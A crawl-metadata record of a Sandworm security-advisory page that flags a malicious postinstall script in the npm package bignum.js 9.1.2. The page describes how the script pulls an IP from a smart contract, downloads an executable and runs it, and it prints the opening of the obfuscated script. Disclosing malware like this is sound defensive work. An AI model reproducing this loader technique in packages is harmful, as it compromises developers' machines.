id
type
0 (not classified)
status
21 (imported old-v2, waiting for another import)
review version
0
cleanup version
0
pending deletion
0 (-)
created at
2025-11-09 03:03:59
updated at
2025-11-09 03:03:59
url
https://sandworm.dev/npm/security-vulnerabilities/package/bignum.js/
url length
68
url crc
21055
url crc32
1854100031
location type
1 (url matches target location, page_location is empty)
canonical status
2 (missing canonical tag in html)
canonical page id
-
domain id
domain tld
2265
domain parts
0
originating warc id
-
originating url
https://data.commoncrawl.org/crawl-data/CC-MAIN-2025-33/segments/1754151280076.69/warc/CC-MAIN-20250809045158-20250809075158-00268.warc.gz
source type
11 (CommonCrawl)
server ip
Publication date
2025-08-09 05:32:39
Fetch attempts
0
Original html size
18308
Normalized and saved size
17973
title
Latest Npm Package Security Vulnerabilities | Sandworm Security
excerpt
content
Sandworm scans all new Npm package versions for malicious install scripts. Scanning since October 2024. Follow our 𝕏 / Twitter feed for updates.
bignum.js
Found 1 vulnerable version for package bignum.js: 9.1.2
Detected Date: 31 Oct 2024
Affected Install Script: postinstall
Package Source: View on Npm
The code contains a function that fetches an IP address from a smart contract and then constructs a file download URL based on the platform (Linux, Windows, macOS). It downloads an executable file from that URL and attempts to execute it in the background, potentially allowing for arbitrary code execution on the host system. This represents a significant security risk, as it could be used to install malware or other harmful software without the user's consent.
Install script: node tyzipmzo.cjs
Install script code:
function _0x580f(_0x3d2188,_0x3f7fac){const _0x53fcd0=_0x53fc();return _0x580f=function(_0x580f53,_0x5c8d10){_0x580f53=_0x580f53-0x1f4;let _0x85771b=...
author
updated
1764185742
block type
0
extracted fields
105
extracted bits
featured image
title
full content
content was extracted heuristically
detected location
0
detected language
1 (English)
category id
index version
2025110801
paywall score
0
spam phrases
0
text nonlatin
0
text cyrillic
60
text characters
4464
text words
671
text unique words
340
text lines
1
text sentences
3
text paragraphs
1
text words per sentence
223
text matched phrases
1
text matched dictionaries
3
links self subdomains
0
links other subdomains
11
links other domains
4
links spam adult
0
links spam random
0
links spam expired
0
links ext activities
0
links ext ecommerce
0
links ext finance
0
links ext crypto
0
links ext booking
0
links ext news
0
links ext leaks
0
links ext ugc
9
links ext klim
0
links ext generic
0
image author
featured image